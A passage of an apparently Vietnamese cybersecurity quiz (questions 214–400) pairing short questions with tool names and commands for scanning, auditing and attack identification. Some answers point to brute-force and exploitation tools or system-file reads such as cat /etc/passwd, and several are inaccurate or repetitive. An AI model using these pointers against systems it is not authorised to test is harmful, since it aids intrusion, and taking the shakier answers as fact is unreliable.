Đáp án: mysql -V hoặc nmap -sV -p 3306 <IP>.


Câu 214:

Hỏi: Tấn công nào khai thác việc không mã hóa dữ liệu trong quá trình truyền tải?
Đáp án: Man-in-the-Middle (MITM).


Câu 215:

Hỏi: Công cụ nào phù hợp để thực hiện reconnaissance qua giao thức SMB?
Đáp án: SMBClient hoặc Nmap với script smb-*.


Câu 216:

Hỏi: Làm thế nào để phát hiện cấu hình firewall không đúng?
Đáp án: Chạy Nmap với các flag kiểm tra firewall như -sA hoặc -Pn.


Câu 217:

Hỏi: Công cụ nào được dùng để kiểm tra bảo mật ứng dụng IoT?
Đáp án: Shodan hoặc IoT Inspector.


Câu 218:

Hỏi: Làm thế nào để kiểm tra tính toàn vẹn của hệ thống tệp?
Đáp án: Dùng tripwire hoặc aide.


Câu 219:

Hỏi: Công cụ nào phù hợp để phân tích nhật ký hệ thống?
Đáp án: Splunk hoặc ELK Stack.


Câu 220:

Hỏi: Lệnh nào dùng để kiểm tra port TCP cụ thể đang mở?
Đáp án: nmap -p <port> <IP>.

Câu 221:

Hỏi: Lệnh nào kiểm tra hệ điều hành đang chạy trên máy chủ?
Đáp án: nmap -O <IP>.


Câu 222:

Hỏi: Công cụ nào tốt nhất để phát hiện mật khẩu mặc định trên thiết bị IoT?
Đáp án: Shodan hoặc Censys.


Câu 223:

Hỏi: Tấn công nào khai thác lỗ hổng CSRF?
Đáp án: Lừa người dùng thực hiện hành động không mong muốn trên trang web.


Câu 224:

Hỏi: Lệnh nào kiểm tra các bản ghi DNS TXT?
Đáp án: dig txt <domain>.


Câu 225:

Hỏi: Làm thế nào để phát hiện lỗ hổng cấu hình trên dịch vụ NTP?
Đáp án: Chạy ntpq -p để kiểm tra thông tin cấu hình.


Câu 226:

Hỏi: Công cụ nào được dùng để kiểm tra bảo mật ứng dụng qua REST API?
Đáp án: Postman hoặc Burp Suite.


Câu 227:

Hỏi: Phương pháp tốt nhất để kiểm tra mật khẩu được lưu trữ trên thiết bị di động?
Đáp án: Phân tích file keychain hoặc keystore.


Câu 228:

Hỏi: Làm thế nào để kiểm tra tính bảo mật của giao thức HTTPS?
Đáp án: Sử dụng SSL Labs hoặc OpenSSL.


Câu 229:

Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật cho ứng dụng cloud?
Đáp án: ScoutSuite hoặc Prowler.


Câu 230:

Hỏi: Lệnh nào kiểm tra thông tin chi tiết về phiên bản dịch vụ trên một port?
Đáp án: nmap -sV -p <port> <IP>.


Câu 231:

Hỏi: Công cụ nào được dùng để phát hiện các lỗ hổng trong ứng dụng PHP?
Đáp án: RIPS hoặc SonarQube.


Câu 232:

Hỏi: Tấn công nào khai thác việc không kiểm tra quyền truy cập?
Đáp án: Privilege Escalation.


Câu 233:

Hỏi: Lệnh nào kiểm tra firewall đang lọc các gói tin?
Đáp án: nmap -sA <IP>.


Câu 234:

Hỏi: Làm thế nào để kiểm tra tính bảo mật của dịch vụ FTP?
Đáp án: Chạy kiểm tra với Nmap và script ftp-*.


Câu 235:

Hỏi: Công cụ nào phù hợp để kiểm tra lỗ hổng ứng dụng container?
Đáp án: Aqua Trivy hoặc Clair.


Câu 236:

Hỏi: Lệnh nào kiểm tra thông tin routing trên hệ thống?
Đáp án: netstat -rn hoặc ip route.


Câu 237:

Hỏi: Công cụ nào được dùng để kiểm tra cấu hình bảo mật trên AWS?
Đáp án: ScoutSuite hoặc Prowler.


Câu 238:

Hỏi: Tấn công nào khai thác lỗ hổng liên quan đến file upload?
Đáp án: Arbitrary File Upload.


Câu 239:

Hỏi: Lệnh nào kiểm tra thông tin về cấu hình SNMP?
Đáp án: snmpwalk hoặc snmp-check.


Câu 240:

Hỏi: Công cụ nào phù hợp để phân tích các bản ghi log bảo mật?
Đáp án: Splunk hoặc ELK Stack.

Câu 241:

Hỏi: Lệnh nào kiểm tra thông tin kết nối TCP đang hoạt động?
Đáp án: netstat -an | grep ESTABLISHED.


Câu 242:

Hỏi: Công cụ nào dùng để kiểm tra lưu lượng mạng đối với lỗ hổng ARP spoofing?
Đáp án: Ettercap hoặc Wireshark.


Câu 243:

Hỏi: Tấn công nào khai thác việc không xác thực session ID?
Đáp án: Session Hijacking.


Câu 244:

Hỏi: Công cụ nào phù hợp để kiểm tra cấu hình bảo mật trên Azure?
Đáp án: AzSK (Azure Security Kit).


Câu 245:

Hỏi: Lệnh nào kiểm tra các bản ghi SRV trên DNS?
Đáp án: dig srv <domain>.


Câu 246:

Hỏi: Làm thế nào để kiểm tra bảo mật giao thức SMB trên Windows?
Đáp án: Chạy kiểm tra với Nmap và script smb-*.


Câu 247:

Hỏi: Công cụ nào được dùng để phân tích lỗ hổng mạng không dây?
Đáp án: Aircrack-ng hoặc Kismet.


Câu 248:

Hỏi: Làm thế nào để phát hiện lỗ hổng trong cấu hình server Apache?
Đáp án: Sử dụng Nikto.


Câu 249:

Hỏi: Công cụ nào tốt nhất để kiểm tra lỗ hổng trong ứng dụng Node.js?
Đáp án: Snyk hoặc Retire.js.


Câu 250:

Hỏi: Lệnh nào kiểm tra tất cả các kết nối trên một hệ thống Linux?
Đáp án: netstat -tuln.


Câu 251:

Hỏi: Công cụ nào được dùng để phát hiện lỗ hổng trong ứng dụng Python?
Đáp án: Bandit hoặc PyLint.


Câu 252:

Hỏi: Tấn công nào khai thác lỗi xử lý input trong JSON API?
Đáp án: JSON Injection.


Câu 253:

Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật trên Kubernetes?
Đáp án: kube-bench hoặc kube-hunter.


Câu 254:

Hỏi: Làm thế nào để kiểm tra cấu hình tường lửa không đúng trên Linux?
Đáp án: Kiểm tra với iptables -L hoặc ufw status.


Câu 255:

Hỏi: Lệnh nào kiểm tra giao thức ICMP đang hoạt động trên hệ thống?
Đáp án: ping <IP> hoặc traceroute <IP>.


Câu 256:

Hỏi: Công cụ nào dùng để kiểm tra và khai thác lỗ hổng trên web?
Đáp án: Burp Suite hoặc OWASP ZAP.


Câu 257:

Hỏi: Lệnh nào kiểm tra trạng thái của các interface mạng trên Linux?
Đáp án: ifconfig hoặc ip addr.


Câu 258:

Hỏi: Công cụ nào phù hợp để kiểm tra tính bảo mật của ứng dụng container?
Đáp án: Aqua Trivy hoặc Clair.


Câu 259:

Hỏi: Tấn công nào khai thác lỗ hổng trong giao thức Telnet?
Đáp án: Credential Interception.


Câu 260:

Hỏi: Làm thế nào để kiểm tra xem một port UDP cụ thể có mở không?
Đáp án: nmap -sU -p <port> <IP>.

Câu 261:

Hỏi: Lệnh nào kiểm tra hệ thống file đang sử dụng dung lượng lớn nhất?
Đáp án: df -h hoặc du -sh /*.


Câu 262:

Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật mạng nội bộ?
Đáp án: Nmap hoặc Wireshark.


Câu 263:

Hỏi: Tấn công nào khai thác việc không kiểm tra cấu hình cross-origin?
Đáp án: Cross-Origin Resource Sharing (CORS) Misconfiguration.


Câu 264:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trong môi trường GCP?
Đáp án: GCP Forseti hoặc ScoutSuite.


Câu 265:

Hỏi: Lệnh nào kiểm tra tốc độ kết nối mạng?
Đáp án: iperf hoặc speedtest-cli.


Câu 266:

Hỏi: Làm thế nào để phát hiện lỗ hổng liên quan đến mật khẩu yếu trên SMB?
Đáp án: Sử dụng Hydra hoặc Medusa.


Câu 267:

Hỏi: Công cụ nào phân tích các gói tin độc hại?
Đáp án: Wireshark hoặc tcpdump.


Câu 268:

Hỏi: Tấn công nào khai thác lỗ hổng trong cấu hình API?
Đáp án: Broken Object Level Authorization (BOLA).


Câu 269:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trong môi trường container?
Đáp án: kube-bench hoặc Docker Bench for Security.


Câu 270:

Hỏi: Lệnh nào liệt kê tất cả các process đang chạy trên hệ thống?
Đáp án: ps aux hoặc top.


Câu 271:

Hỏi: Công cụ nào phù hợp để kiểm tra các dịch vụ nền tảng cloud?
Đáp án: ScoutSuite hoặc CloudSploit.


Câu 272:

Hỏi: Làm thế nào để kiểm tra trạng thái của các cổng mạng?
Đáp án: netstat -tuln hoặc ss -tuln.


Câu 273:

Hỏi: Công cụ nào phù hợp để kiểm tra các lỗ hổng ứng dụng web?
Đáp án: Nikto hoặc OWASP ZAP.


Câu 274:

Hỏi: Tấn công nào khai thác lỗ hổng upload path traversal?
Đáp án: Path Traversal.


Câu 275:

Hỏi: Làm thế nào để kiểm tra hệ thống có bị lỗi DNS cache poisoning?
Đáp án: Phân tích các bản ghi DNS thông qua Wireshark.


Câu 276:

Hỏi: Công cụ nào kiểm tra và quét các plugin WordPress?
Đáp án: WPScan.


Câu 277:

Hỏi: Lệnh nào kiểm tra nhật ký hệ thống trên Linux?
Đáp án: journalctl hoặc cat /var/log/syslog.


Câu 278:

Hỏi: Công cụ nào phù hợp để kiểm tra dịch vụ DNS?
Đáp án: dig hoặc nslookup.


Câu 279:

Hỏi: Làm thế nào để kiểm tra lỗ hổng trong giao thức HTTP?
Đáp án: Sử dụng Burp Suite hoặc Nikto.


Câu 280:

Hỏi: Tấn công nào khai thác lỗ hổng trong file cookie?
Đáp án: Cookie Poisoning.

Câu 281:

Hỏi: Công cụ nào phù hợp để phân tích mã độc trong file thực thi?
Đáp án: IDA Pro hoặc Ghidra.


Câu 282:

Hỏi: Lệnh nào hiển thị các kết nối mạng đang mở trên Windows?
Đáp án: netstat -an.


Câu 283:

Hỏi: Tấn công nào khai thác việc không mã hóa mật khẩu trong API?
Đáp án: Credential Leakage.


Câu 284:

Hỏi: Công cụ nào phù hợp để kiểm tra lỗ hổng trong server email?
Đáp án: SMTPTester hoặc Nmap với script smtp-*.


Câu 285:

Hỏi: Lệnh nào kiểm tra trạng thái kết nối của một cổng cụ thể?
Đáp án: telnet <IP> <port>.


Câu 286:

Hỏi: Công cụ nào được dùng để phát hiện lỗ hổng cấu hình trên hệ thống Linux?
Đáp án: Lynis hoặc OpenSCAP.


Câu 287:

Hỏi: Tấn công nào khai thác việc không kiểm tra input trên web form?
Đáp án: SQL Injection.


Câu 288:

Hỏi: Làm thế nào để phát hiện lỗ hổng bảo mật trong tệp Dockerfile?
Đáp án: Sử dụng Hadolint hoặc Trivy.


Câu 289:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật hệ thống IoT?
Đáp án: IoT Inspector hoặc Shodan.


Câu 290:

Hỏi: Lệnh nào kiểm tra thông tin chi tiết của một package cài đặt trên Linux?
Đáp án: dpkg -s <package> hoặc rpm -qi <package>.


Câu 291:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên AWS Lambda?
Đáp án: Prowler hoặc ScoutSuite.


Câu 292:

Hỏi: Làm thế nào để phát hiện lỗ hổng cấu hình trong file .htaccess?
Đáp án: Sử dụng Nikto hoặc kiểm tra thủ công.


Câu 293:

Hỏi: Tấn công nào khai thác lỗi kiểm tra quyền truy cập trong ứng dụng?
Đáp án: Broken Access Control.


Câu 294:

Hỏi: Công cụ nào phù hợp để quét lỗ hổng trên các thiết bị IoT?
Đáp án: Nessus hoặc Shodan.


Câu 295:

Hỏi: Lệnh nào kiểm tra trạng thái của các dịch vụ trên Linux?
Đáp án: systemctl status hoặc service --status-all.


Câu 296:

Hỏi: Công cụ nào được dùng để kiểm tra các lỗ hổng trong ứng dụng Ruby?
Đáp án: Brakeman.


Câu 297:

Hỏi: Tấn công nào khai thác việc lưu thông tin nhạy cảm trong cache?
Đáp án: Cache Poisoning.


Câu 298:

Hỏi: Làm thế nào để kiểm tra dịch vụ DHCP trên mạng?
Đáp án: Sử dụng dhclient hoặc dhcpdump.


Câu 299:

Hỏi: Công cụ nào phân tích lưu lượng mạng để phát hiện mã độc?
Đáp án: Wireshark hoặc Zeek.


Câu 300:

Hỏi: Lệnh nào kiểm tra trạng thái file system trên Linux?
Đáp án: fsck hoặc mount.

Câu 301:

Hỏi: Công cụ nào phù hợp để phát hiện các lỗ hổng trên website?
Đáp án: OWASP ZAP hoặc Burp Suite.


Câu 302:

Hỏi: Lệnh nào hiển thị danh sách các group của người dùng hiện tại trên Linux?
Đáp án: groups hoặc id -Gn.


Câu 303:

Hỏi: Tấn công nào khai thác việc không kiểm tra độ dài input?
Đáp án: Buffer Overflow.


Câu 304:

Hỏi: Công cụ nào kiểm tra và phát hiện cấu hình yếu trên dịch vụ FTP?
Đáp án: Nmap với script ftp-* hoặc Nikto.


Câu 305:

Hỏi: Lệnh nào kiểm tra version của Apache đang chạy trên server?
Đáp án: apache2 -v hoặc httpd -v.


Câu 306:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật ứng dụng Java?
Đáp án: FindSecBugs hoặc OWASP Dependency-Check.


Câu 307:

Hỏi: Làm thế nào để kiểm tra trạng thái của CPU trên Linux?
Đáp án: top, htop, hoặc cat /proc/cpuinfo.


Câu 308:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên dịch vụ email?
Đáp án: SMTPTester hoặc MxToolbox.


Câu 309:

Hỏi: Tấn công nào khai thác lỗ hổng trong giao thức HTTPS?
Đáp án: SSL Stripping.


Câu 310:

Hỏi: Công cụ nào phù hợp để quét lỗ hổng trên hệ thống SCADA?
Đáp án: OpenVAS hoặc Nessus.


Câu 311:

Hỏi: Lệnh nào kiểm tra các module đang chạy trên kernel Linux?
Đáp án: lsmod hoặc modinfo.


Câu 312:

Hỏi: Công cụ nào dùng để kiểm tra và khai thác lỗ hổng SMB?
Đáp án: Metasploit hoặc SMBClient.


Câu 313:

Hỏi: Làm thế nào để phát hiện lỗ hổng liên quan đến session ID?
Đáp án: Sử dụng Burp Suite hoặc OWASP ZAP.


Câu 314:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật trong môi trường Docker?
Đáp án: Docker Bench for Security hoặc Trivy.


Câu 315:

Hỏi: Lệnh nào kiểm tra trạng thái của các file hệ thống trên Linux?
Đáp án: df -h hoặc lsblk.


Câu 316:

Hỏi: Tấn công nào khai thác lỗi cấu hình không đúng trên DNS?
Đáp án: DNS Zone Transfer Attack.


Câu 317:

Hỏi: Công cụ nào dùng để phát hiện lỗ hổng trong hệ thống Windows?
Đáp án: Nessus hoặc Metasploit.


Câu 318:

Hỏi: Làm thế nào để kiểm tra trạng thái RAM trên Linux?
Đáp án: free -h hoặc vmstat.


Câu 319:

Hỏi: Công cụ nào kiểm tra bảo mật ứng dụng dựa trên framework Ruby on Rails?
Đáp án: Brakeman.


Câu 320:

Hỏi: Lệnh nào kiểm tra quyền truy cập file trên Linux?
Đáp án: ls -l hoặc stat <file>.

Câu 321:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật ứng dụng Python?
Đáp án: Bandit hoặc PyLint.


Câu 322:

Hỏi: Lệnh nào kiểm tra thời gian hoạt động của hệ thống trên Linux?
Đáp án: uptime.


Câu 323:

Hỏi: Tấn công nào khai thác lỗ hổng liên quan đến API rate-limiting?
Đáp án: API Abuse.


Câu 324:

Hỏi: Công cụ nào kiểm tra và phát hiện lỗ hổng trong ứng dụng PHP?
Đáp án: RIPS hoặc SonarQube.


Câu 325:

Hỏi: Lệnh nào kiểm tra dung lượng ổ đĩa trên Linux?
Đáp án: df -h.


Câu 326:

Hỏi: Làm thế nào để phát hiện lỗ hổng trên các plugin WordPress?
Đáp án: Sử dụng WPScan.


Câu 327:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật mã nguồn ứng dụng?
Đáp án: SonarQube hoặc Checkmarx.


Câu 328:

Hỏi: Làm thế nào để kiểm tra lỗ hổng liên quan đến TLS?
Đáp án: SSL Labs hoặc testssl.sh.


Câu 329:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên dịch vụ cloud?
Đáp án: ScoutSuite hoặc Prowler.


Câu 330:

Hỏi: Tấn công nào khai thác việc không mã hóa thông tin trong cookies?
Đáp án: Cookie Hijacking.


Câu 331:

Hỏi: Lệnh nào kiểm tra cấu hình firewall trên Linux?
Đáp án: iptables -L hoặc ufw status.


Câu 332:

Hỏi: Công cụ nào phù hợp để kiểm tra lỗ hổng trong container images?
Đáp án: Trivy hoặc Clair.


Câu 333:

Hỏi: Làm thế nào để kiểm tra cấu hình DNS bị lỗi?
Đáp án: Sử dụng dig hoặc nslookup.


Câu 334:

Hỏi: Tấn công nào khai thác lỗ hổng lưu mật khẩu trong file config?
Đáp án: Credential Disclosure.


Câu 335:

Hỏi: Công cụ nào dùng để kiểm tra cấu hình bảo mật trong Azure?
Đáp án: AzSK hoặc ScoutSuite.


Câu 336:

Hỏi: Lệnh nào kiểm tra trạng thái của các tiến trình chạy nền trên Linux?
Đáp án: ps aux hoặc top.


Câu 337:

Hỏi: Công cụ nào dùng để phân tích lưu lượng DNS trên mạng?
Đáp án: Wireshark hoặc Zeek.


Câu 338:

Hỏi: Tấn công nào khai thác lỗi input trong JSON-based APIs?
Đáp án: JSON Injection.


Câu 339:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên môi trường Kubernetes?
Đáp án: kube-bench hoặc kube-hunter.


Câu 340:

Hỏi: Lệnh nào kiểm tra lịch sử các lệnh đã thực hiện trên Linux?
Đáp án: history.

Câu 341:

Hỏi: Công cụ nào được sử dụng để kiểm tra bảo mật cho ứng dụng JavaScript?
Đáp án: Retire.js hoặc Snyk.


Câu 342:

Hỏi: Lệnh nào hiển thị thời gian hiện tại của hệ thống trên Linux?
Đáp án: date.


Câu 343:

Hỏi: Tấn công nào khai thác việc không giới hạn số lần thử đăng nhập?
Đáp án: Brute Force Attack.


Câu 344:

Hỏi: Công cụ nào kiểm tra lỗ hổng trong mã nguồn Ruby?
Đáp án: Brakeman.


Câu 345:

Hỏi: Lệnh nào kiểm tra tài nguyên mạng sử dụng trên Linux?
Đáp án: iftop hoặc nload.


Câu 346:

Hỏi: Làm thế nào để phát hiện lỗ hổng SQL Injection?
Đáp án: Sử dụng SQLmap hoặc Burp Suite.


Câu 347:

Hỏi: Công cụ nào phân tích và kiểm tra cấu hình bảo mật của TLS/SSL?
Đáp án: SSL Labs hoặc testssl.sh.


Câu 348:

Hỏi: Làm thế nào để kiểm tra trạng thái của swap memory trên Linux?
Đáp án: free -h hoặc swapon -s.


Câu 349:

Hỏi: Công cụ nào kiểm tra và phân tích lưu lượng FTP?
Đáp án: Wireshark hoặc tcpdump.


Câu 350:

Hỏi: Tấn công nào khai thác lỗi xử lý session expiration?
Đáp án: Session Fixation.


Câu 351:

Hỏi: Lệnh nào kiểm tra trạng thái mount các hệ thống file?
Đáp án: mount hoặc df -h.


Câu 352:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật hệ thống cloud?
Đáp án: ScoutSuite hoặc Prowler.


Câu 353:

Hỏi: Làm thế nào để kiểm tra dịch vụ SSH có được cấu hình bảo mật?
Đáp án: Chạy ssh-audit.


Câu 354:

Hỏi: Công cụ nào kiểm tra và phát hiện lỗ hổng trong ứng dụng container?
Đáp án: Trivy hoặc Aqua.


Câu 355:

Hỏi: Lệnh nào kiểm tra danh sách các cổng đang mở trên Windows?
Đáp án: netstat -an.


Câu 356:

Hỏi: Tấn công nào khai thác lỗ hổng Cross-Origin Resource Sharing (CORS)?
Đáp án: CORS Misconfiguration Attack.


Câu 357:

Hỏi: Công cụ nào kiểm tra các lỗ hổng trong file .env?
Đáp án: GitLeaks hoặc truffleHog.


Câu 358:

Hỏi: Lệnh nào kiểm tra trạng thái của tiến trình trên hệ thống Linux?
Đáp án: ps aux hoặc top.


Câu 359:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật giao thức DNS?
Đáp án: Wireshark hoặc dnstracer.


Câu 360:

Hỏi: Làm thế nào để phát hiện lỗi input validation trong JSON API?
Đáp án: Sử dụng Burp Suite hoặc Postman.

Câu 361:

Hỏi: Công cụ nào được dùng để kiểm tra bảo mật cho ứng dụng React?
Đáp án: Snyk hoặc Retire.js.


Câu 362:

Hỏi: Lệnh nào hiển thị các user hiện đang đăng nhập vào hệ thống?
Đáp án: who hoặc w.


Câu 363:

Hỏi: Tấn công nào khai thác lỗ hổng trong JSON Web Token (JWT)?
Đáp án: JWT Manipulation Attack.


Câu 364:

Hỏi: Công cụ nào phân tích và kiểm tra cấu hình bảo mật cho REST API?
Đáp án: Postman hoặc OWASP ZAP.


Câu 365:

Hỏi: Lệnh nào kiểm tra trạng thái của hệ thống log trên Linux?
Đáp án: journalctl hoặc cat /var/log/syslog.


Câu 366:

Hỏi: Làm thế nào để phát hiện lỗ hổng XSS trong ứng dụng web?
Đáp án: Sử dụng Burp Suite hoặc OWASP ZAP.


Câu 367:

Hỏi: Công cụ nào kiểm tra và phân tích bảo mật giao thức HTTP?
Đáp án: Burp Suite hoặc Nikto.


Câu 368:

Hỏi: Lệnh nào hiển thị thông tin phiên bản kernel trên Linux?
Đáp án: uname -r.


Câu 369:

Hỏi: Công cụ nào được dùng để phân tích lưu lượng mạng HTTPS?
Đáp án: Wireshark với private key hoặc Burp Suite.


Câu 370:

Hỏi: Tấn công nào khai thác lỗi không mã hóa thông tin nhạy cảm?
Đáp án: Data Exposure Attack.


Câu 371:

Hỏi: Lệnh nào kiểm tra trạng thái của các cổng UDP trên hệ thống?
Đáp án: netstat -u hoặc ss -u.


Câu 372:

Hỏi: Công cụ nào phân tích và kiểm tra lỗ hổng giao thức Telnet?
Đáp án: Nmap với script telnet-* hoặc Metasploit.


Câu 373:

Hỏi: Làm thế nào để phát hiện lỗi input validation trong file upload?
Đáp án: Sử dụng Burp Suite hoặc kiểm tra thủ công.


Câu 374:

Hỏi: Công cụ nào kiểm tra và phát hiện lỗ hổng dịch vụ cloud?
Đáp án: ScoutSuite hoặc Prowler.


Câu 375:

Hỏi: Lệnh nào hiển thị danh sách các nhóm người dùng trên Linux?
Đáp án: cat /etc/group.


Câu 376:

Hỏi: Tấn công nào khai thác lỗ hổng cấu hình trên giao thức LDAP?
Đáp án: LDAP Injection.


Câu 377:

Hỏi: Công cụ nào được dùng để kiểm tra bảo mật dịch vụ Kubernetes?
Đáp án: kube-bench hoặc kube-hunter.


Câu 378:

Hỏi: Lệnh nào kiểm tra tốc độ xử lý của hệ thống trên Linux?
Đáp án: uptime hoặc vmstat.


Câu 379:

Hỏi: Công cụ nào phân tích và kiểm tra lỗ hổng giao thức SMB?
Đáp án: SMBClient hoặc Metasploit.


Câu 380:

Hỏi: Làm thế nào để phát hiện các bản ghi DNS không hợp lệ?
Đáp án: Sử dụng dig hoặc kiểm tra thủ công với nslookup.

Câu 381:

Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật cho ứng dụng Angular?
Đáp án: Snyk hoặc Retire.js.


Câu 382:

Hỏi: Lệnh nào hiển thị danh sách các user trên hệ thống Linux?
Đáp án: cat /etc/passwd.


Câu 383:

Hỏi: Tấn công nào khai thác việc không bảo vệ mã thông báo xác thực?
Đáp án: Token Theft Attack.


Câu 384:

Hỏi: Công cụ nào kiểm tra bảo mật và phân tích ứng dụng Node.js?
Đáp án: Snyk hoặc Retire.js.


Câu 385:

Hỏi: Lệnh nào kiểm tra dung lượng RAM vật lý trên Linux?
Đáp án: free -h hoặc cat /proc/meminfo.


Câu 386:

Hỏi: Làm thế nào để phát hiện lỗ hổng Command Injection?
Đáp án: Sử dụng Burp Suite hoặc kiểm tra thủ công.


Câu 387:

Hỏi: Công cụ nào phân tích và kiểm tra lỗ hổng trong giao thức SMTP?
Đáp án: Nmap với script smtp-* hoặc Metasploit.


Câu 388:

Hỏi: Lệnh nào hiển thị thông tin về tất cả các interface mạng trên Linux?
Đáp án: ifconfig hoặc ip addr.


Câu 389:

Hỏi: Công cụ nào kiểm tra lưu lượng HTTPS để phát hiện mã độc?
Đáp án: Wireshark hoặc Burp Suite.


Câu 390:

Hỏi: Tấn công nào khai thác việc không mã hóa thông tin trong URL?
Đáp án: URL Parameter Tampering.


Câu 391:

Hỏi: Lệnh nào kiểm tra tất cả các tiến trình đang mở trên hệ thống?
Đáp án: ps aux hoặc top.


Câu 392:

Hỏi: Công cụ nào kiểm tra và phân tích bảo mật giao thức FTP?
Đáp án: Wireshark hoặc Nmap với script ftp-*.


Câu 393:

Hỏi: Làm thế nào để phát hiện lỗi input validation trong REST API?
Đáp án: Sử dụng Postman hoặc Burp Suite.


Câu 394:

Hỏi: Công cụ nào phân tích và kiểm tra bảo mật ứng dụng container?
Đáp án: Aqua Trivy hoặc Docker Bench for Security.


Câu 395:

Hỏi: Lệnh nào hiển thị thông tin routing trên Linux?
Đáp án: route -n hoặc ip route.


Câu 396:

Hỏi: Tấn công nào khai thác việc lưu trữ dữ liệu nhạy cảm không được mã hóa?
Đáp án: Sensitive Data Exposure.


Câu 397:

Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trong môi trường cloud?
Đáp án: ScoutSuite hoặc Prowler.


Câu 398:

Hỏi: Lệnh nào kiểm tra trạng thái của các dịch vụ trên Windows?
Đáp án: sc query hoặc Get-Service (trên PowerShell).


Câu 399:

Hỏi: Công cụ nào phân tích và kiểm tra cấu hình DNS?
Đáp án: dig hoặc nslookup.


Câu 400:

Hỏi: Làm thế nào để phát hiện lỗi bảo mật trong file cấu hình ứng dụng?
Đáp án: Sử dụng kiểm tra thủ công hoặc công cụ như Trivy.

Back to blog